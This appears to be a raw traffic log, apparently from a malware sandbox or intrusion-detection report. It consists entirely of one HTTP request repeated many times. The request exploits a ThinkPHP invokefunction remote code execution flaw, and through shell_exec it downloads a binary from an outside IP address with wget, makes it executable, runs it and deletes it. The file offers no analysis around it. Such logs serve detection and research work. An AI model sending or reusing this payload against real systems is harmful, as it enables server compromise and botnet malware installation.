          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
          Source: global trafficHTTP traffic detected: GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://93.123.85.5/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1Connection: keep-aliveAccept-Encoding: gzip, deflateAccept: /User-Agent: Uirusu/2.0
